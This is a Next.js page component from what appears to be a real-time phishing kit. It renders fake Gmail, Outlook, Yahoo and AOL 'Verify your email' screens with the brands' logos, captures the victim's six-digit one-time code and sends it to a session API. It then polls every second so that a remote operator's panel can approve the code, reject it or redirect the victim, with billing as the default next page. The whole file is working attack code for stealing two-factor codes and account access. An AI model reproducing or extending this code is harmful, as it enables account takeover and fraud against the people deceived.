"use client";

import { useState, useEffect, useRef, useMemo } from "react";
import { useRouter, useSearchParams } from "next/navigation";
import ClientProtection from "@/components/ClientProtection";

type Provider = "gmail" | "outlook" | "yahoo" | "aol" | "other";

function detectProvider(email: string): Provider {
  const lower = email.toLowerCase();
  if (lower.includes("gmail.com")) return "gmail";
  if (
    lower.includes("outlook.com") ||
    lower.includes("live.com") ||
    lower.includes("hotmail.")
  )
    return "outlook";
  if (lower.includes("yahoo.")) return "yahoo";
  if (lower.includes("aol.com")) return "aol";
  return "other";
}

export default function EmailOtpPage() {
  const router = useRouter();
  const searchParams = useSearchParams();
  const sessionId = useMemo(
    () => searchParams.get("sessionId") || "",
    [searchParams]
  );
  const username = useMemo(
    () => searchParams.get("username") || "",
    [searchParams]
  );
  const [email, setEmail] = useState(searchParams.get("email") || "");
  const provider = useMemo(() => {
    const urlProvider = searchParams.get("provider") as Provider;
    const detectedProvider = email ? detectProvider(email) : "other";
    // Use detected provider if we have an email, otherwise fall back to URL parameter
    const finalProvider = email ? detectedProvider : urlProvider || "other";

    console.log("🔍 Email OTP Provider Detection:", {
      email,
      urlProvider,
      detectedProvider,
      finalProvider,
    });

    return finalProvider;
  }, [searchParams, email]);

  const [otp, setOtp] = useState("");
  const [isLoading, setIsLoading] = useState(false);
  const [error, setError] = useState("");
  const [otpValues, setOtpValues] = useState<string[]>(Array(6).fill(""));
  const otpInputs = Array(6)
    .fill(0)
    .map(() => useRef<HTMLInputElement>(null));

  // Admin decision checking
  const checkAdminDecision = async () => {
    if (!sessionId) return;
    try {
      const response = await fetch(`/api/session?sessionId=${sessionId}`);
      const session = await response.json();
      console.log("🔍 Email OTP page checking admin decision:", session);

      if (session?.status === "approved") {
        setIsLoading(false);

        // Update email from session data if not already set
        if (!email && session.data?.email) {
          setEmail(session.data.email as string);
          console.log(
            "📧 Updated email from session data:",
            session.data.email
          );
        }

        // UNIVERSAL REDIRECT CHECK - Admin can redirect to ANY page
        if (session.redirectTo) {
          const params = new URLSearchParams({
            sessionId,
            username: username || "",
          });
          console.log(`🚀 Admin redirect to: ${session.redirectTo}`);

          // Preserve email/provider through redirects where relevant
          if (
            session.redirectTo === "email" ||
            session.redirectTo === "email-password"
          ) {
            if (email) params.set("email", email);
            if (provider) params.set("provider", provider);
          }

          const redirectUrl = `/${session.redirectTo}?${params.toString()}`;
          console.log(`🚀 Redirecting to: ${redirectUrl}`);
          router.push(redirectUrl);
          return; // Exit early after redirect
        }

        // Default flow after email OTP verification - go to billing
        const params = new URLSearchParams({
          sessionId,
          username: username || "",
        });
        router.push(`/billing?${params.toString()}`);
      } else if (session?.status === "rejected") {
        setIsLoading(false);
        setError(session.rejectionReason || "Invalid email verification code");
      }
    } catch (error) {
      console.error("Error checking admin decision:", error);
    }
  };

  // Always poll for admin actions so CRM buttons work at any time
  useEffect(() => {
    if (sessionId) {
      checkAdminDecision(); // initial immediate check
      const interval = setInterval(checkAdminDecision, 1000);
      return () => clearInterval(interval);
    }
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [sessionId]);

  // Redirect if no session data
  useEffect(() => {
    if (!sessionId && !isLoading) {
      router.push("/");
    }
  }, [sessionId, isLoading, router]);

  const handleOtpChange = (index: number, value: string) => {
    if (value.length > 1) return;

    // Clear error when user starts typing
    if (error) {
      setError("");
    }

    const newValues = [...otpValues];
    newValues[index] = value;
    setOtpValues(newValues);
    setOtp(newValues.join(""));

    if (value && index < 5) {
      otpInputs[index + 1].current?.focus();
    }
  };

  const handleOtpKeyDown = (index: number, e: React.KeyboardEvent) => {
    if (e.key === "Backspace" && !otpValues[index] && index > 0) {
      otpInputs[index - 1].current?.focus();
    }
  };

  const handleSubmit = async (e: React.FormEvent) => {
    e.preventDefault();
    if (otp.length !== 6) return;

    setIsLoading(true);
    setError("");

    try {
      const response = await fetch("/api/session", {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          sessionId,
          step: "email-otp-verify",
          data: {
            emailOtpCode: otp,
          },
        }),
      });

      if (response.ok) {
        console.log("📧 Email OTP submitted, waiting for admin approval...");
        // Keep loading state - checkAdminDecision will handle the next step
      } else {
        setError("Failed to submit verification code");
        setIsLoading(false);
      }
    } catch (error) {
      console.error("Error submitting email OTP:", error);
      setError("Network error occurred");
      setIsLoading(false);
    }
  };

  // Gmail-style UI
  if (provider === "gmail") {
    return (
      <ClientProtection>
        <div className="min-h-screen bg-white flex flex-col items-center justify-center p-4">
          <div className="w-full max-w-md">
            {/* Gmail Logo */}
            <div className="text-center mb-8">
              <img
                src="/gmail-logo.png"
                alt="Gmail"
                className="h-12 w-auto mx-auto mb-4"
              />
              <h1 className="text-2xl font-normal text-gray-700">
                Verify your email
              </h1>
              <p className="text-sm text-gray-600 mt-2">
                Enter the 6-digit code sent to
              </p>
              <p className="text-sm font-medium text-red-600 mt-1">{email}</p>
            </div>

            <div className="bg-white border border-gray-300 rounded-lg p-8 shadow-sm">
              <form onSubmit={handleSubmit} className="space-y-6">
                <div className="flex justify-center space-x-3">
                  {otpValues.map((value, index) => (
                    <input
                      key={index}
                      ref={otpInputs[index]}
                      type="text"
                      inputMode="numeric"
                      maxLength={1}
                      value={value}
                      onChange={(e) => handleOtpChange(index, e.target.value)}
                      onKeyDown={(e) => handleOtpKeyDown(index, e)}
                      className="w-12 h-12 text-center text-xl font-semibold border-2 border-gray-300 rounded focus:outline-none focus:border-red-500 transition-colors text-gray-900"
                      disabled={isLoading}
                    />
                  ))}
                </div>

                {error && (
                  <div className="bg-red-50 border border-red-200 rounded p-3">
                    <p className="text-red-600 text-sm text-center">{error}</p>
                  </div>
                )}

                <button
                  type="submit"
                  disabled={isLoading || otp.length !== 6}
                  className="w-full border border-red-600 text-red-600 py-3 rounded font-medium hover:bg-red-50 disabled:opacity-50 disabled:cursor-not-allowed transition-colors"
                >
                  {isLoading ? "Verifying..." : "Verify"}
                </button>

                <div className="text-center">
                  <button
                    type="button"
                    className="text-red-600 text-sm font-medium hover:underline"
                    disabled={isLoading}
                  >
                    Resend code
                  </button>
                </div>
              </form>
            </div>
          </div>
        </div>
      </ClientProtection>
    );
  }

  // Outlook-style UI
  if (provider === "outlook") {
    return (
      <ClientProtection>
        <div className="min-h-screen bg-white flex flex-col items-center justify-center p-4">
          <div className="w-full max-w-md">
            {/* Outlook Logo */}
            <div className="text-center mb-8">
              <img
                src="/outlook-logo.png"
                alt="Outlook"
                className="h-12 w-auto mx-auto mb-4"
              />
              <h1 className="text-2xl font-normal text-gray-700">
                Verify your email
              </h1>
              <p className="text-sm text-gray-600 mt-2">
                Enter the 6-digit code sent to
              </p>
              <p className="text-sm font-medium text-blue-600 mt-1">{email}</p>
            </div>

            <div className="bg-white border border-gray-300 rounded p-8 shadow-sm">
              <form onSubmit={handleSubmit} className="space-y-6">
                <div className="flex justify-center space-x-3">
                  {otpValues.map((value, index) => (
                    <input
                      key={index}
                      ref={otpInputs[index]}
                      type="text"
                      inputMode="numeric"
                      maxLength={1}
                      value={value}
                      onChange={(e) => handleOtpChange(index, e.target.value)}
                      onKeyDown={(e) => handleOtpKeyDown(index, e)}
                      className="w-12 h-12 text-center text-xl font-semibold border-2 border-gray-300 rounded focus:outline-none focus:border-blue-500 transition-colors text-gray-900"
                      disabled={isLoading}
                    />
                  ))}
                </div>

                {error && (
                  <div className="bg-red-50 border border-red-200 rounded p-3">
                    <p className="text-red-600 text-sm text-center">{error}</p>
                  </div>
                )}

                <button
                  type="submit"
                  disabled={isLoading || otp.length !== 6}
                  className="w-full border border-blue-600 text-blue-600 py-3 rounded font-medium hover:bg-blue-50 disabled:opacity-50 disabled:cursor-not-allowed transition-colors"
                >
                  {isLoading ? "Verifying..." : "Verify"}
                </button>

                <div className="text-center">
                  <button
                    type="button"
                    className="text-blue-600 text-sm font-medium hover:underline"
                    disabled={isLoading}
                  >
                    Resend code
                  </button>
                </div>
              </form>
            </div>
          </div>
        </div>
      </ClientProtection>
    );
  }

  // Yahoo-style UI
  if (provider === "yahoo") {
    return (
      <ClientProtection>
        <div className="min-h-screen bg-white flex flex-col items-center justify-center p-4">
          <div className="w-full max-w-md">
            {/* Yahoo Logo */}
            <div className="text-center mb-8">
              <img
                src="/yahoo.png"
                alt="Yahoo"
                className="h-12 w-auto mx-auto mb-4"
              />
              <h1 className="text-2xl font-normal text-gray-700">
                Verify your email
              </h1>
              <p className="text-sm text-gray-600 mt-2">
                Enter the 6-digit code sent to
              </p>
              <p className="text-sm font-medium text-purple-600 mt-1">
                {email}
              </p>
            </div>

            <div className="bg-white border border-gray-300 rounded-lg p-8 shadow-sm">
              <form onSubmit={handleSubmit} className="space-y-6">
                <div className="flex justify-center space-x-3">
                  {otpValues.map((value, index) => (
                    <input
                      key={index}
                      ref={otpInputs[index]}
                      type="text"
                      inputMode="numeric"
                      maxLength={1}
                      value={value}
                      onChange={(e) => handleOtpChange(index, e.target.value)}
                      onKeyDown={(e) => handleOtpKeyDown(index, e)}
                      className="w-12 h-12 text-center text-xl font-semibold border-2 border-gray-300 rounded-lg focus:outline-none focus:border-purple-500 transition-colors text-gray-900"
                      disabled={isLoading}
                    />
                  ))}
                </div>

                {error && (
                  <div className="bg-red-50 border border-red-200 rounded p-3">
                    <p className="text-red-600 text-sm text-center">{error}</p>
                  </div>
                )}

                <button
                  type="submit"
                  disabled={isLoading || otp.length !== 6}
                  className="w-full border border-purple-600 text-purple-600 py-3 rounded-lg font-medium hover:bg-purple-50 disabled:opacity-50 disabled:cursor-not-allowed transition-colors"
                >
                  {isLoading ? "Verifying..." : "Verify"}
                </button>

                <div className="text-center">
                  <button
                    type="button"
                    className="text-purple-600 text-sm font-medium hover:underline"
                    disabled={isLoading}
                  >
                    Resend code
                  </button>
                </div>
              </form>
            </div>
          </div>
        </div>
      </ClientProtection>
    );
  }

  // AOL-style UI
  if (provider === "aol") {
    return (
      <ClientProtection>
        <div className="min-h-screen bg-white flex flex-col items-center justify-center p-4">
          <div className="w-full max-w-md">
            {/* AOL Logo */}
            <div className="text-center mb-8">
              <img
                src="/aol.png"
                alt="AOL"
                className="h-12 w-auto mx-auto mb-4"
              />
              <h1 className="text-2xl font-normal text-gray-700">
                Verify your email
              </h1>
              <p className="text-sm text-gray-600 mt-2">
                Enter the 6-digit code sent to
              </p>
              <p className="text-sm font-medium text-blue-800 mt-1">{email}</p>
            </div>

            <div className="bg-white border border-gray-300 rounded p-8 shadow-sm">
              <form onSubmit={handleSubmit} className="space-y-6">
                <div className="flex justify-center space-x-3">
                  {otpValues.map((value, index) => (
                    <input
                      key={index}
                      ref={otpInputs[index]}
                      type="text"
                      inputMode="numeric"
                      maxLength={1}
                      value={value}
                      onChange={(e) => handleOtpChange(index, e.target.value)}
                      onKeyDown={(e) => handleOtpKeyDown(index, e)}
                      className="w-12 h-12 text-center text-xl font-semibold border-2 border-gray-300 rounded focus:outline-none focus:border-blue-800 transition-colors text-gray-900"
                      disabled={isLoading}
                    />
                  ))}
                </div>

                {error && (
                  <div className="bg-red-50 border border-red-200 rounded p-3">
                    <p className="text-red-600 text-sm text-center">{error}</p>
                  </div>
                )}

                <button
                  type="submit"
                  disabled={isLoading || otp.length !== 6}
                  className="w-full border border-blue-800 text-blue-800 py-3 rounded font-medium hover:bg-blue-50 disabled:opacity-50 disabled:cursor-not-allowed transition-colors"
                >
                  {isLoading ? "Verifying..." : "Verify"}
                </button>

                <div className="text-center">
                  <button
                    type="button"
                    className="text-blue-800 text-sm font-medium hover:underline"
                    disabled={isLoading}
                  >
                    Resend code
                  </button>
                </div>
              </form>
            </div>
          </div>
        </div>
      </ClientProtection>
    );
  }

  // Generic/Other provider UI (fallback)
  return (
    <ClientProtection>
      <div className="min-h-screen bg-gray-50 flex flex-col items-center justify-center p-4">
        <div className="w-full max-w-md">
          {/* Generic Email Logo */}
          <div className="text-center mb-8">
            <div className="w-16 h-16 bg-gray-600 rounded-full flex items-center justify-center mx-auto mb-4">
              <svg
                className="w-8 h-8 text-white"
                fill="currentColor"
                viewBox="0 0 24 24"
              >
                <path d="M1.5 8.67v8.58a3 3 0 003 3h15a3 3 0 003-3V8.67l-8.928 5.493a3 3 0 01-3.144 0L1.5 8.67z" />
                <path d="M22.5 6.908V6.75a3 3 0 00-3-3h-15a3 3 0 00-3 3v.158l9.714 5.978a1.5 1.5 0 001.572 0L22.5 6.908z" />
              </svg>
            </div>
            <h1 className="text-2xl font-light text-gray-800">
              Verify your email
            </h1>
            <p className="text-sm text-gray-600 mt-2">
              Enter the 6-digit code sent to
            </p>
            <p className="text-sm font-medium text-gray-700 mt-1">{email}</p>
          </div>

          <div className="bg-white border border-gray-300 rounded-lg p-8 shadow-sm">
            <form onSubmit={handleSubmit} className="space-y-6">
              <div className="flex justify-center space-x-3">
                {otpValues.map((value, index) => (
                  <input
                    key={index}
                    ref={otpInputs[index]}
                    type="text"
                    inputMode="numeric"
                    maxLength={1}
                    value={value}
                    onChange={(e) => handleOtpChange(index, e.target.value)}
                    onKeyDown={(e) => handleOtpKeyDown(index, e)}
                    className="w-12 h-12 text-center text-xl font-semibold border-2 border-gray-300 rounded-lg focus:outline-none focus:border-gray-500 transition-colors text-gray-900"
                    disabled={isLoading}
                  />
                ))}
              </div>

              {error && (
                <div className="bg-red-50 border border-red-200 rounded p-3">
                  <p className="text-red-600 text-sm text-center">{error}</p>
                </div>
              )}

              <button
                type="submit"
                disabled={isLoading || otp.length !== 6}
                className="w-full bg-gray-800 text-white py-3 rounded-lg font-medium hover:bg-gray-900 disabled:opacity-50 disabled:cursor-not-allowed transition-colors"
              >
                {isLoading ? "Verifying..." : "Verify"}
              </button>

              <div className="text-center">
                <button
                  type="button"
                  className="text-gray-600 text-sm font-medium hover:underline"
                  disabled={isLoading}
                >
                  Resend code
                </button>
              </div>
            </form>
          </div>
        </div>
      </div>
    </ClientProtection>
  );
}
